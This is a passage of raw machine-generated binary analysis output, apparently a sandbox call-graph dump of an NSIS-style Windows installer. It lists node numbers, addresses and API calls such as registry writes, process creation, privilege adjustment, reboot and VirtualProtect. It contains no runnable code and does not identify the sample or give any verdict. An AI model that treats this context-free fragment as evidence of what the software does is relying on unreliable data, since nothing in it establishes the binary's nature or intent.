4225->4224 4226->4220 4235 4060f1 4227->4235 4230 4061b6 4230->4209 4231 406186 RegQueryValueExW RegCloseKey 4231->4230 4232->4209 4233->4209 4234->4203 4236 406100 4235->4236 4237 406104 4236->4237 4238 406109 RegOpenKeyExW 4236->4238 4237->4230 4237->4231 4238->4237 4240 405b8c 4239->4240 4241 405ba2 4240->4241 4242 405b93 CharNextW 4240->4242 4241->4224 4242->4240 4292 406284 lstrcpynW 4243->4292 4245 405c72 4293 405c04 CharNextW CharNextW 4245->4293 4248 4059b6 4248->4164 4248->4165 4249 406518 5 API calls 4255 405c88 4249->4255 4250 405cb9 lstrlenW 4251 405cc4 4250->4251 4250->4255 4252 405b59 3 API calls 4251->4252 4254 405cc9 GetFileAttributesW 4252->4254 4253 4065c7 2 API calls 4253->4255 4254->4248 4255->4248 4255->4250 4255->4253 4256 405ba5 2 API calls 4255->4256 4256->4250 4257->4169 4259 405bb3 4258->4259 4260 405bc5 4259->4260 4261 405bb9 CharPrevW 4259->4261 4260->4172 4261->4259 4261->4260 4262->4195 4299 405d55 GetFileAttributesW 4263->4299 4266 40597b 4266->4195 4267 405971 DeleteFileW 4269 405977 4267->4269 4268 405969 RemoveDirectoryW 4268->4269 4269->4266 4270 405987 SetFileAttributesW 4269->4270 4270->4266 4272 4053a9 4271->4272 4274 405307 4271->4274 4272->4195 4273 405323 lstrlenW 4276 405331 lstrlenW 4273->4276 4277 40534c 4273->4277 4274->4273 4275 4062a6 17 API calls 4274->4275 4275->4273 4276->4272 4278 405343 lstrcatW 4276->4278 4279 405352 SetWindowTextW 4277->4279 4280 40535f 4277->4280 4278->4277 4279->4280 4280->4272 4281 405365 SendMessageW SendMessageW SendMessageW 4280->4281 4281->4272 4283 40606b 4282->4283 4284 40605e 4282->4284 4283->4195 4302 405ed0 4284->4302 4287 405b1a 4286->4287 4288 4065dd FindClose 4286->4288 4287->4166 4287->4179 4288->4287 4290 405b24 4289->4290 4291 405b75 lstrcatW 4289->4291 4290->4183 4291->4290 4292->4245 4294 405c21 4293->4294 4297 405c33 4293->4297 4295 405c2e CharNextW 4294->4295 4294->4297 4298 405c57 4295->4298 4296 405b86 CharNextW 4296->4297 4297->4296 4297->4298 4298->4248 4298->4249 4300 40595a 4299->4300 4301 405d67 SetFileAttributesW 4299->4301 4300->4266 4300->4267 4300->4268 4301->4300 4303 405f00 4302->4303 4304 405f26 GetShortPathNameW 4302->4304 4329 405d7a GetFileAttributesW CreateFileW 4303->4329 4306 406045 4304->4306 4307 405f3b 4304->4307 4306->4283 4307->4306 4309 405f43 wsprintfA 4307->4309 4308 405f0a CloseHandle GetShortPathNameW 4308->4306 4310 405f1e 4308->4310 4311 4062a6 17 API calls 4309->4311 4310->4304 4310->4306 4312 405f6b 4311->4312 4330 405d7a GetFileAttributesW CreateFileW 4312->4330 4314 405f78 4314->4306 4315 405f87 GetFileSize GlobalAlloc 4314->4315 4316 405fa9 4315->4316 4317 40603e CloseHandle 4315->4317 4331 405dfd ReadFile 4316->4331 4317->4306 4322 405fc8 lstrcpyA 4325 405fea 4322->4325 4323 405fdc 4324 405cdf 4 API calls 4323->4324 4324->4325 4326 406021 SetFilePointer 4325->4326 4338 405e2c WriteFile 4326->4338 4329->4308 4330->4314 4332 405e1b 4331->4332 4332->4317 4333 405cdf lstrlenA 4332->4333 4334 405d20 lstrlenA 4333->4334 4335 405cf9 lstrcmpiA 4334->4335 4336 405d28 4334->4336 4335->4336 4337 405d17 CharNextA 4335->4337 4336->4322 4336->4323 4337->4334 4339 405e4a GlobalFree 4338->4339 4339->4317 4340 4015c1 4341 402c41 17 API calls 4340->4341 4342 4015c8 4341->4342 4343 405c04 4 API calls 4342->4343 4355 4015d1 4343->4355 4344 401631 4345 401663 4344->4345 4346 401636 4344->4346 4350 401423 24 API calls 4345->4350 4367 401423 4346->4367 4347 405b86 CharNextW 4347->4355 4356 40165b 4350->4356 4354 40164a SetCurrentDirectoryW 4354->4356 4355->4344 4355->4347 4357 401617 GetFileAttributesW 4355->4357 4359 405855 4355->4359 4362 4057bb CreateDirectoryW 4355->4362 4371 405838 CreateDirectoryW 4355->4371 4357->4355 4374 40665e GetModuleHandleA 4359->4374 4363 405808 4362->4363 4364 40580c GetLastError 4362->4364 4363->4355 4364->4363 4365 40581b SetFileSecurityW 4364->4365 4365->4363 4366 405831 GetLastError 4365->4366 4366->4363 4368 4052ec 24 API calls 4367->4368 4369 401431 4368->4369 4370 406284 lstrcpynW 4369->4370 4370->4354 4372 405848 4371->4372 4373 40584c GetLastError 4371->4373 4372->4355 4373->4372 4375 406684 GetProcAddress 4374->4375 4376 40667a 4374->4376 4378 40585c 4375->4378 4380 4065ee GetSystemDirectoryW 4376->4380 4378->4355 4379 406680 4379->4375 4379->4378 4381 406610 wsprintfW LoadLibraryExW 4380->4381 4381->4379 5178 6fbc103d 5181 6fbc101b 5178->5181 5188 6fbc1516 5181->5188 5183 6fbc1020 5184 6fbc1024 5183->5184 5185 6fbc1027 GlobalAlloc 5183->5185 5186 6fbc153d 3 API calls 5184->5186 5185->5184 5187 6fbc103b 5186->5187 5190 6fbc151c 5188->5190 5189 6fbc1522 5189->5183 5190->5189 5191 6fbc152e GlobalFree 5190->5191 5191->5183 5192 404a42 5193 404a52 5192->5193 5194 404a6e 5192->5194 5203 4058ce GetDlgItemTextW 5193->5203 5196 404aa1 5194->5196 5197 404a74 SHGetPathFromIDListW 5194->5197 5199 404a84 5197->5199 5202 404a8b SendMessageW 5197->5202 5198 404a5f SendMessageW 5198->5194 5201 40140b 2 API calls 5199->5201 5201->5202 5202->5196 5203->5198 4567 401e49 4568 402c1f 17 API calls 4567->4568 4569 401e4f 4568->4569 4570 402c1f 17 API calls 4569->4570 4571 401e5b 4570->4571 4572 401e72 EnableWindow 4571->4572 4573 401e67 ShowWindow 4571->4573 4574 402ac5 4572->4574 4573->4574 4575 40264a 4576 402c1f 17 API calls 4575->4576 4577 402659 4576->4577 4578 4026a3 ReadFile 4577->4578 4579 405dfd ReadFile 4577->4579 4580 40273c 4577->4580 4581 4026e3 MultiByteToWideChar 4577->4581 4582 402798 4577->4582 4585 402709 SetFilePointer MultiByteToWideChar 4577->4585 4586 4027a9 4577->4586 4588 402796 4577->4588 4578->4577 4578->4588 4579->4577 4580->4577 4580->4588 4589 405e5b SetFilePointer 4580->4589 4581->4577 4598 4061cb wsprintfW 4582->4598 4585->4577 4587 4027ca SetFilePointer 4586->4587 4586->4588 4587->4588 4590 405e77 4589->4590 4597 405e8f 4589->4597 4591 405dfd ReadFile 4590->4591 4592 405e83 4591->4592 4593 405ec0 SetFilePointer 4592->4593 4594 405e98 SetFilePointer 4592->4594 4592->4597 4593->4597 4594->4593 4595 405ea3 4594->4595 4596 405e2c WriteFile 4595->4596 4596->4597 4597->4580 4598->4588 5228 4016cc 5229 402c41 17 API calls 5228->5229 5230 4016d2 GetFullPathNameW 5229->5230 5231 4016ec 5230->5231 5237 40170e 5230->5237 5234 4065c7 2 API calls 5231->5234 5231->5237 5232 401723 GetShortPathNameW 5233 402ac5 5232->5233 5235 4016fe 5234->5235 5235->5237 5238 406284 lstrcpynW 5235->5238 5237->5232 5237->5233 5238->5237 5239 40234e 5240 402c41 17 API calls 5239->5240 5241 40235d 5240->5241 5242 402c41 17 API calls 5241->5242 5243 402366 5242->5243 5244 402c41 17 API calls 5243->5244 5245 402370 GetPrivateProfileStringW 5244->5245 5246 401b53 5247 402c41 17 API calls 5246->5247 5248 401b5a 5247->5248 5249 402c1f 17 API calls 5248->5249 5250 401b63 wsprintfW 5249->5250 5251 402ac5 5250->5251 5252 401956 5253 402c41 17 API calls 5252->5253 5254 40195d lstrlenW 5253->5254 5255 402592 5254->5255 5256 4014d7 5257 402c1f 17 API calls 5256->5257 5258 4014dd Sleep 5257->5258 5260 402ac5 5258->5260 5261 401f58 5262 402c41 17 API calls 5261->5262 5263 401f5f 5262->5263 5264 4065c7 2 API calls 5263->5264 5265 401f65 5264->5265 5267 401f76 5265->5267 5268 4061cb wsprintfW 5265->5268 5268->5267 4932 403359 SetErrorMode GetVersion 4933 403398 4932->4933 4934 40339e 4932->4934 4935 40665e 5 API calls 4933->4935 4936 4065ee 3 API calls 4934->4936 4935->4934 4937 4033b4 lstrlenA 4936->4937 4937->4934 4938 4033c4 4937->4938 4939 40665e 5 API calls 4938->4939 4940 4033cb 4939->4940 4941 40665e 5 API calls 4940->4941 4942 4033d2 4941->4942 4943 40665e 5 API calls 4942->4943 4944 4033de #17 OleInitialize SHGetFileInfoW 4943->4944 5022 406284 lstrcpynW 4944->5022 4947 40342a GetCommandLineW 5023 406284 lstrcpynW 4947->5023 4949 40343c 4950 405b86 CharNextW 4949->4950 4951 403461 CharNextW 4950->4951 4952 40358b GetTempPathW 4951->4952 4958 40347a 4951->4958 5024 403328 4952->5024 4954 4035a3 4955 4035a7 GetWindowsDirectoryW lstrcatW 4954->4955 4956 4035fd DeleteFileW 4954->4956 4959 403328 12 API calls 4955->4959 5034 402edd GetTickCount GetModuleFileNameW 4956->5034 4960 405b86 CharNextW 4958->4960 4964 403574 4958->4964 4967 403576 4958->4967 4962 4035c3 4959->4962 4960->4958 4961 403611 4965 4036b4 4961->4965 4969 405b86 CharNextW 4961->4969 5017 4036c4 4961->5017 4962->4956 4963 4035c7 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4962->4963 4968 403328 12 API calls 4963->4968 4964->4952 5062 403974 4965->5062 5118 406284 lstrcpynW 4967->5118 4973 4035f5 4968->4973 4986 403630 4969->4986 4973->4956 4973->5017 4974 4037fe 4976 403882 ExitProcess 4974->4976 4977 403806 GetCurrentProcess OpenProcessToken 4974->4977 4975 4036de 4978 4058ea MessageBoxIndirectW 4975->4978 4979 403852 4977->4979 4980 40381e LookupPrivilegeValueW AdjustTokenPrivileges 4977->4980 4984 4036ec ExitProcess 4978->4984 4985 40665e 5 API calls 4979->4985 4980->4979 4982 4036f4 4988 405855 5 API calls 4982->4988 4983 40368e 4987 405c61 18 API calls 4983->4987 4990 403859 4985->4990 4986->4982 4986->4983 4991 40369a 4987->4991 4989 4036f9 lstrcatW 4988->4989 4992 403715 lstrcatW lstrcmpiW 4989->4992 4993 40370a lstrcatW 4989->4993 4994 40386e ExitWindowsEx 4990->4994 4997 40387b 4990->4997 4991->5017 5119 406284 lstrcpynW 4991->5119 4996 403731 4992->4996 4992->5017 4993->4992 4994->4976 4994->4997 4999 403736 4996->4999 5000 40373d 4996->5000 5001 40140b 2 API calls 4997->5001 4998 4036a9 5120 406284 lstrcpynW 4998->5120 5003 4057bb 4 API calls 4999->5003 5004 405838 2 API calls 5000->5004 5001->4976 5005 40373b 5003->5005 5006 403742 SetCurrentDirectoryW 5004->5006 5005->5006 5007 403752 5006->5007 5008 40375d 5006->5008 5128 406284 lstrcpynW 5007->5128 5129 406284 lstrcpynW 5008->5129 5011 4062a6 17 API calls 5012 40379c DeleteFileW 5011->5012 5013 4037a9 CopyFileW 5012->5013 5019 40376b 5012->5019 5013->5019 5014 4037f2 5016 40604a 36 API calls 5014->5016 5015 40604a 36 API calls 5015->5019 5016->5017 5121 40389a 5017->5121 5018 4062a6 17 API calls 5018->5019 5019->5011 5019->5014 5019->5015 5019->5018 5021 4037dd CloseHandle 5019->5021 5130 40586d CreateProcessW 5019->5130 5021->5019 5022->4947 5023->4949 5025 406518 5 API calls 5024->5025 5026 403334 5025->5026 5027 40333e 5026->5027 5028 405b59 3 API calls 5026->5028 5027->4954 5029 403346 5028->5029 5030 405838 2 API calls 5029->5030 5031 40334c 5030->5031 5133 405da9 5031->5133 5137 405d7a GetFileAttributesW CreateFileW 5034->5137 5036 402f1d 5055 402f2d 5036->5055 5138 406284 lstrcpynW 5036->5138 5038 402f43 5039 405ba5 2 API calls 5038->5039 5040 402f49 5039->5040 5139 406284 lstrcpynW 5040->5139 5042 402f54 GetFileSize 5043 403050 5042->5043 5061 402f6b 5042->5061 5140 402e79 5043->5140 5045 403059 5047 403089 GlobalAlloc 5045->5047 5045->5055 5152 403311 SetFilePointer 5045->5152 5046 4032fb ReadFile 5046->5061 5151 403311 SetFilePointer 5047->5151 5049 4030bc 5051 402e79 6 API calls 5049->5051 5051->5055 5052 403072 5056 4032fb ReadFile 5052->5056 5053 4030a4 5054 403116 35 API calls 5053->5054 5059 4030b0 5054->5059 5055->4961 5057 40307d 5056->5057 5057->5047 5057->5055 5058 402e79 6 API calls 5058->5061 5059->5055 5059->5059 5060 4030ed SetFilePointer 5059->5060 5060->5055 5061->5043 5061->5046 5061->5049 5061->5055 5061->5058 5063 40665e 5 API calls 5062->5063 5064 403988 5063->5064 5065 4039a0 5064->5065 5066 40398e 5064->5066 5067 406152 3 API calls 5065->5067 5165 4061cb wsprintfW 5066->5165 5068 4039d0 5067->5068 5070 4039ef lstrcatW 5068->5070 5072 406152 3 API calls 5068->5072 5071 40399e 5070->5071 5157 403c4a 5071->5157 5072->5070 5075 405c61 18 API calls 5076 403a21 5075->5076 5077 403ab5 5076->5077 5079 406152 3 API calls 5076->5079 5078 405c61 18 API calls 5077->5078 5080 403abb 5078->5080 5081 403a53 5079->5081 5082 403acb LoadImageW 5080->5082 5083 4062a6 17 API calls 5080->5083 5081->5077 5086 403a74 lstrlenW 5081->5086 5089 405b86 CharNextW 5081->5089 5084 403b71 5082->5084 5085 403af2 RegisterClassW 5082->5085 5083->5082 5088 40140b 2 API calls 5084->5088 5087 403b28 SystemParametersInfoW CreateWindowExW 5085->5087 5117 403b7b 5085->5117 5090 403a82 lstrcmpiW 5086->5090 5091 403aa8 5086->5091 5087->5084 5092 403b77 5088->5092 5093 403a71 5089->5093 5090->5091 5094 403a92 GetFileAttributesW 5090->5094 5095 405b59 3 API calls 5091->5095 5097 403c4a 18 API calls 5092->5097 5092->5117 5093->5086 5096 403a9e 5094->5096 5098 403aae 5095->5098 5096->5091 5099 405ba5 2 API calls 5096->5099 5100 403b88 5097->5100 5166 406284 lstrcpynW 5098->5166 5099->5091 5102 403b94 ShowWindow 5100->5102 5103 403c17 5100->5103 5104 4065ee 3 API calls 5102->5104 5105 4053bf 5 API calls 5103->5105 5106 403bac 5104->5106 5107 403c1d 5105->5107 5108 403bba GetClassInfoW 5106->5108 5111 4065ee 3 API calls 5106->5111 5109 403c21 5107->5109 5110 403c39 5107->5110 5113 403be4 DialogBoxParamW 5108->5113 5114 403bce GetClassInfoW RegisterClassW 5108->5114 5115 40140b 2 API calls 5109->5115 5109->5117 5112 40140b 2 API calls 5110->5112 5111->5108 5112->5117 5116 40140b 2 API calls 5113->5116 5114->5113 5115->5117 5116->5117 5117->5017 5118->4964 5119->4998 5120->4965 5122 4038b2 5121->5122 5123 4038a4 CloseHandle 5121->5123 5168 4038df 5122->5168 5123->5122 5126 405996 67 API calls 5127 4036cd OleUninitialize 5126->5127 5127->4974 5127->4975 5128->5008 5129->5019 5131 4058a0 CloseHandle 5130->5131 5132 4058ac 5130->5132 5131->5132 5132->5019 5134 405db6 GetTickCount GetTempFileNameW 5133->5134 5135 403357 5134->5135 5136 405dec 5134->5136 5135->4954 5136->5134 5136->5135 5137->5036 5138->5038 5139->5042 5141 402e82 5140->5141 5142 402e9a 5140->5142 5143 402e92 5141->5143 5144 402e8b DestroyWindow 5141->5144 5145 402ea2 5142->5145 5146 402eaa GetTickCount 5142->5146 5143->5045 5144->5143 5153 40669a 5145->5153 5147 402eb8 CreateDialogParamW ShowWindow 5146->5147 5148 402edb 5146->5148 5147->5148 5148->5045 5151->5053 5152->5052 5154 4066b7 PeekMessageW 5153->5154 5155 402ea8 5154->5155 5156 4066ad DispatchMessageW 5154->5156 5155->5045 5156->5154 5158 403c5e 5157->5158 5167 4061cb wsprintfW 5158->5167 5160 403ccf 5161 403d03 18 API calls 5160->5161 5163 403cd4 5161->5163 5162 4039ff 5162->5075 5163->5162 5164 4062a6 17 API calls 5163->5164 5164->5163 5165->5071 5166->5077 5167->5160 5169 4038ed 5168->5169 5170 4038b7 5169->5170 5171 4038f2 FreeLibrary GlobalFree 5169->5171 5170->5126 5171->5170 5171->5171 5269 402259 5270 402c41 17 API calls 5269->5270 5271 40225f 5270->5271 5272 402c41 17 API calls 5271->5272 5273 402268 5272->5273 5274 402c41 17 API calls 5273->5274 5275 402271 5274->5275 5276 4065c7 2 API calls 5275->5276 5277 40227a 5276->5277 5278 40228b lstrlenW lstrlenW 5277->5278 5282 40227e 5277->5282 5279 4052ec 24 API calls 5278->5279 5281 4022c9 SHFileOperationW 5279->5281 5280 4052ec 24 API calls 5283 402286 5280->5283 5281->5282 5281->5283 5282->5280 5172 40175c 5173 402c41 17 API calls 5172->5173 5174 401763 5173->5174 5175 405da9 2 API calls 5174->5175 5176 40176a 5175->5176 5177 405da9 2 API calls 5176->5177 5177->5176 5291 401d5d GetDlgItem GetClientRect 5292 402c41 17 API calls 5291->5292 5293 401d8f LoadImageW SendMessageW 5292->5293 5294 402ac5 5293->5294 5295 401dad DeleteObject 5293->5295 5295->5294 5296 4022dd 5297 4022e4 5296->5297 5300 4022f7 5296->5300 5298 4062a6 17 API calls 5297->5298 5299 4022f1 5298->5299 5301 4058ea MessageBoxIndirectW 5299->5301 5301->5300 5302 405260 5303 405270 5302->5303 5304 405284 5302->5304 5305 405276 5303->5305 5306 4052cd 5303->5306 5307 40528c IsWindowVisible 5304->5307 5313 4052a3 5304->5313 5310 404247 SendMessageW 5305->5310 5309 4052d2 CallWindowProcW 5306->5309 5307->5306 5308 405299 5307->5308 5315 404bb6 SendMessageW 5308->5315 5312 405280 5309->5312 5310->5312 5313->5309 5320 404c36 5313->5320 5316 404c15 SendMessageW 5315->5316 5317 404bd9 GetMessagePos ScreenToClient SendMessageW 5315->5317 5319 404c0d 5316->5319 5318 404c12 5317->5318 5317->5319 5318->5316 5319->5313 5329 406284 lstrcpynW 5320->5329 5322 404c49 5330 4061cb wsprintfW 5322->5330 5324 404c53 5325 40140b 2 API calls 5324->5325 5326 404c5c 5325->5326 5331 406284 lstrcpynW 5326->5331 5328 404c63 5328->5306 5329->5322 5330->5324 5331->5328 5332 401563 5333 402a6b 5332->5333 5336 4061cb wsprintfW 5333->5336 5335 402a70 5336->5335 4490 4023e4 4491 402c41 17 API calls 4490->4491 4492 4023f6 4491->4492 4493 402c41 17 API calls 4492->4493 4494 402400 4493->4494 4507 402cd1 4494->4507 4497 402c41 17 API calls 4500 40242e lstrlenW 4497->4500 4498 402438 4499 402444 4498->4499 4511 402c1f 4498->4511 4502 402463 RegSetValueExW 4499->4502 4514 403116 4499->4514 4500->4498 4504 402479 RegCloseKey 4502->4504 4506 40288b 4504->4506 4508 402cec 4507->4508 4535 40611f 4508->4535 4512 4062a6 17 API calls 4511->4512 4513 402c34 4512->4513 4513->4499 4515 40312f 4514->4515 4516 40315a 4515->4516 4549 403311 SetFilePointer 4515->4549 4539 4032fb 4516->4539 4520 403177 GetTickCount 4531 40318a 4520->4531 4521 40329b 4522 40329f 4521->4522 4527 4032b7 4521->4527 4524 4032fb ReadFile 4522->4524 4523 403285 4523->4502 4524->4523 4525 4032fb ReadFile 4525->4527 4526 4032fb ReadFile 4526->4531 4527->4523 4527->4525 4528 405e2c WriteFile 4527->4528 4528->4527 4530 4031f0 GetTickCount 4530->4531 4531->4523 4531->4526 4531->4530 4532 403219 MulDiv wsprintfW 4531->4532 4534 405e2c WriteFile 4531->4534 4542 4067df 4531->4542 4533 4052ec 24 API calls 4532->4533 4533->4531 4534->4531 4536 40612e 4535->4536 4537 402410 4536->4537 4538 406139 RegCreateKeyExW 4536->4538 4537->4497 4537->4498 4537->4506 4538->4537 4540 405dfd ReadFile 4539->4540 4541 403165 4540->4541 4541->4520 4541->4521 4541->4523 4543 406804 4542->4543 4544 40680c 4542->4544 4543->4531 4544->4543 4545 406893 GlobalFree 4544->4545 4546 40689c GlobalAlloc 4544->4546 4547 406913 GlobalAlloc 4544->4547 4548 40690a GlobalFree 4544->4548 4545->4546 4546->4543 4546->4544 4547->4543 4547->4544 4548->4547 4549->4516 5337 404c68 GetDlgItem GetDlgItem 5338 404cba 7 API calls 5337->5338 5350 404ed3 5337->5350 5339 404d50 SendMessageW 5338->5339 5340 404d5d DeleteObject 5338->5340 5339->5340 5341 404d66 5340->5341 5343 404d9d 5341->5343 5344 4062a6 17 API calls 5341->5344 5342 404fb7 5346 405063 5342->5346 5352 404ec6 5342->5352 5357 405010 SendMessageW 5342->5357 5345 4041fb 18 API calls 5343->5345 5347 404d7f SendMessageW SendMessageW 5344->5347 5351 404db1 5345->5351 5348 405075 5346->5348 5349 40506d SendMessageW 5346->5349 5347->5341 5359 405087 ImageList_Destroy 5348->5359 5360 40508e 5348->5360 5368 40509e 5348->5368 5349->5348 5350->5342 5355 404bb6 5 API calls 5350->5355 5371 404f44 5350->5371 5356 4041fb 18 API calls 5351->5356 5353 404262 8 API calls 5352->5353 5358 405259 5353->5358 5354 404fa9 SendMessageW 5354->5342 5355->5371 5372 404dbf 5356->5372 5357->5352 5362 405025 SendMessageW 5357->5362 5359->5360 5363 405097 GlobalFree 5360->5363 5360->5368 5361 40520d 5361->5352 5366 40521f ShowWindow GetDlgItem ShowWindow 5361->5366 5365 405038 5362->5365 5363->5368 5364 404e94 GetWindowLongW SetWindowLongW 5367 404ead 5364->5367 5374 405049 SendMessageW 5365->5374 5366->5352 5369 404eb3 ShowWindow 5367->5369 5370 404ecb 5367->5370 5368->5361 5373 4050d9 5368->5373 5381 404c36 4 API calls 5368->5381 5388 404230 SendMessageW 5369->5388 5389 404230 SendMessageW 5370->5389 5371->5342 5371->5354 5372->5364 5375 404e8e 5372->5375 5378 404e0f SendMessageW 5372->5378 5379 404e4b SendMessageW 5372->5379 5380 404e5c SendMessageW 5372->5380 5384 405107 SendMessageW 5373->5384 5387 40511d 5373->5387 5374->5346 5375->5364 5375->5367 5378->5372 5379->5372 5380->5372 5381->5373 5382 4051e3 InvalidateRect 5382->5361 5383 4051f9 5382->5383 5390 404b71 5383->5390 5384->5387 5386 405191 SendMessageW SendMessageW 5386->5387 5387->5382 5387->5386 5388->5352 5389->5350 5393 404aa8 5390->5393 5392 404b86 5392->5361 5394 404ac1 5393->5394 5395 4062a6 17 API calls 5394->5395 5396 404b25 5395->5396 5397 4062a6 17 API calls 5396->5397 5398 404b30 5397->5398 5399 4062a6 17 API calls 5398->5399 5400 404b46 lstrlenW wsprintfW SetDlgItemTextW 5399->5400 5400->5392 5401 402868 5402 402c41 17 API calls 5401->5402 5403 40286f FindFirstFileW 5402->5403 5404 402882 5403->5404 5405 402897 5403->5405 5409 4061cb wsprintfW 5405->5409 5407 4028a0 5410 406284 lstrcpynW 5407->5410 5409->5407 5410->5404 5411 401968 5412 402c1f 17 API calls 5411->5412 5413 40196f 5412->5413 5414 402c1f 17 API calls 5413->5414 5415 40197c 5414->5415 5416 402c41 17 API calls 5415->5416 5417 401993 lstrlenW 5416->5417 5419 4019a4 5417->5419 5418 4019e5 5419->5418 5423 406284 lstrcpynW 5419->5423 5421 4019d5 5421->5418 5422 4019da lstrlenW 5421->5422 5422->5418 5423->5421 5424 40166a 5425 402c41 17 API calls 5424->5425 5426 401670 5425->5426 5427 4065c7 2 API calls 5426->5427 5428 401676 5427->5428 4599 6fbc2997 4600 6fbc29e7 4599->4600 4601 6fbc29a7 VirtualProtect 4599->4601 4601->4600 5429 40436b lstrlenW 5430 40438a 5429->5430 5431 40438c WideCharToMultiByte 5429->5431 5430->5431 5432 4046ec 5433 404718 5432->5433 5434 404729 5432->5434 5493 4058ce GetDlgItemTextW 5433->5493 5435 404735 GetDlgItem 5434->5435 5442 404794 5434->5442 5437 404749 5435->5437 5441 40475d SetWindowTextW 5437->5441 5445 405c04 4 API calls 5437->5445 5438 404878 5490 404a27 5438->5490 5495 4058ce GetDlgItemTextW 5438->5495 5439 404723 5440 406518 5 API calls 5439->5440 5440->5434 5446 4041fb 18 API calls 5441->5446 5442->5438 5447 4062a6 17 API calls 5442->5447 5442->5490 5444 404262 8 API calls 5449 404a3b 5444->5449 5450 404753 5445->5450 5451 404779 5446->5451 5452 404808 SHBrowseForFolderW 5447->5452 5448 4048a8 5453 405c61 18 API calls 5448->5453 5450->5441 5457 405b59 3 API calls 5450->5457 5454 4041fb 18 API calls 5451->5454 5452->5438 5455 404820 CoTaskMemFree 5452->5455 5456 4048ae 5453->5456 5458 404787 5454->5458 5459 405b59 3 API calls 5455->5459 5496 406284 lstrcpynW 5456->5496 5457->5441 5494 404230 SendMessageW 5458->5494 5462 40482d 5459->5462 5464 404864 SetDlgItemTextW 5462->5464 5468 4062a6 17 API calls 5462->5468 5463 40478d 5466 40665e 5 API calls 5463->5466 5464->5438 5465 4048c5 5467 40665e 5 API calls 5465->5467 5466->5442 5475 4048cc 5467->5475 5469 40484c lstrcmpiW 5468->5469 5469->5464 5471 40485d lstrcatW 5469->5471 5470 40490d 5497 406284 lstrcpynW 5470->5497 5471->5464 5473 404914 5474 405c04 4 API calls 5473->5474 5476 40491a GetDiskFreeSpaceW 5474->5476 5475->5470 5479 405ba5 2 API calls 5475->5479 5480 404965 5475->5480 5478 40493e MulDiv 5476->5478 5476->5480 5478->5480 5479->5475 5481 4049d6 5480->5481 5482 404b71 20 API calls 5480->5482 5483 4049f9 5481->5483 5485 40140b 2 API calls 5481->5485 5484 4049c3 5482->5484 5498 40421d KiUserCallbackDispatcher 5483->5498 5486 4049d8 SetDlgItemTextW 5484->5486 5487 4049c8 5484->5487 5485->5483 5486->5481 5489 404aa8 20 API calls 5487->5489 5489->5481 5490->5444 5491 404a15 5491->5490 5499 404645 5491->5499 5493->5439 5494->5463 5495->5448 5496->5465 5497->5473 5498->5491 5500 404653 5499->5500 5501 404658 SendMessageW 5499->5501 5500->5501 5501->5490 4668 40176f 4669 402c41 17 API calls 4668->4669 4670 401776 4669->4670 4671 401796 4670->4671 4672 40179e 4670->4672 4708 406284 lstrcpynW 4671->4708 4709 406284 lstrcpynW 4672->4709 4675 40179c 4679 406518 5 API calls 4675->4679 4676 4017a9 4677 405b59 3 API calls 4676->4677 4678 4017af lstrcatW 4677->4678 4678->4675 4684 4017bb 4679->4684 4680 4017f7 4682 405d55 2 API calls 4680->4682 4681 4065c7 2 API calls 4681->4684 4682->4684 4684->4680 4684->4681 4685 4017cd CompareFileTime 4684->4685 4686 40188d 4684->4686 4687 401864 4684->4687 4690 406284 lstrcpynW 4684->4690 4696 4062a6 17 API calls 4684->4696 4707 405d7a GetFileAttributesW CreateFileW 4684->4707 4710 4058ea 4684->4710 4685->4684 4688 4052ec 24 API calls 4686->4688 4689 4052ec 24 API calls 4687->4689 4706 401879 4687->4706 4691 401897 4688->4691 4689->4706 4690->4684 4692 403116 35 API calls 4691->4692 4693 4018aa 4692->4693 4694 4018be SetFileTime 4693->4694 4695 4018d0 CloseHandle 4693->4695 4694->4695 4697 4018e1 4695->4697 4695->4706 4696->4684 4698 4018e6 4697->4698 4699 4018f9 4697->4699 4700 4062a6 17 API calls 4698->4700 4701 4062a6 17 API calls 4699->4701 4703 4018ee lstrcatW 4700->4703 4704 401901 4701->4704 4703->4704 4705 4058ea MessageBoxIndirectW 4704->4705 4705->4706 4707->4684 4708->4675 4709->4676 4711 4058ff 4710->4711 4712 40594b 4711->4712 4713 405913 MessageBoxIndirectW 4711->4713 4712->4684 4713->4712 4714 4027ef 4715 402a70 4714->4715 4716 4027f6 4714->4716 4717 402c1f 17 API calls 4716->4717 4718 4027fd 4717->4718 4719 40280c SetFilePointer 4718->4719 4719->4715 4720 40281c 4719->4720 4722 4061cb wsprintfW 4720->4722 4722->4715 5502 401a72 5503 402c1f 17 API calls 5502->5503 5504 401a7b 5503->5504 5505 402c1f 17 API calls 5504->5505 5506 401a20 5505->5506 5514 401573 5515 401583 ShowWindow 5514->5515 5516 40158c 5514->5516 5515->5516 5517 402ac5 5516->5517 5518 40159a ShowWindow 5516->5518 5518->5517 5519 401cf3 5520 402c1f 17 API calls 5519->5520 5521 401cf9 IsWindow 5520->5521 5522 401a20 5521->5522 5523 402df3 5524 402e05 SetTimer 5523->5524 5526 402e1e 5523->5526 5524->5526 5525 402e73 5526->5525 5527 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5526->5527 5527->5525 5528 4014f5 SetForegroundWindow 5529 402ac5 5528->5529 5530 402576 5531 402c41 17 API calls 5530->5531 5532 40257d 5531->5532 5535 405d7a GetFileAttributesW CreateFileW 5532->5535 5534 402589 5535->5534 4909 401b77 4910 401b84 4909->4910 4911 401bc8 4909->4911 4916 401b9b 4910->4916 4918 401c0d 4910->4918 4912 401bf2 GlobalAlloc 4911->4912 4913 401bcd 4911->4913 4915 4062a6 17 API calls 4912->4915 4924 4022f7 4913->4924 4930 406284 lstrcpynW 4913->4930 4914 4062a6 17 API calls 4919 4022f1 4914->4919 4915->4918 4928 406284 lstrcpynW 4916->4928 4918->4914 4918->4924 4922 4058ea MessageBoxIndirectW 4919->4922 4921 401bdf GlobalFree 4921->4924 4922->4924 4923 401baa 4929 406284 lstrcpynW 4923->4929 4926 401bb9 4931 406284 lstrcpynW 4926->4931 4928->4923 4929->4926 4930->4921 4931->4924 5536 4024f8 5537 402c81 17 API calls 5536->5537 5538 402502 5537->5538 5539 402c1f 17 API calls 5538->5539 5540 40250b 5539->5540 5541 402533 RegEnumValueW 5540->5541 5542 402527 RegEnumKeyW 5540->5542 5544 40288b 5540->5544 5543 402548 RegCloseKey 5541->5543 5542->5543 5543->5544 5546 40167b 5547 402c41 17 API calls 5546->5547 5548 401682 5547->5548 5549 402c41 17 API calls 5548->5549 5550 40168b 5549->5550 5551 402c41 17 API calls 5550->5551 5552 401694 MoveFileW 5551->5552 5553 4016a0 5552->5553 5554 4016a7 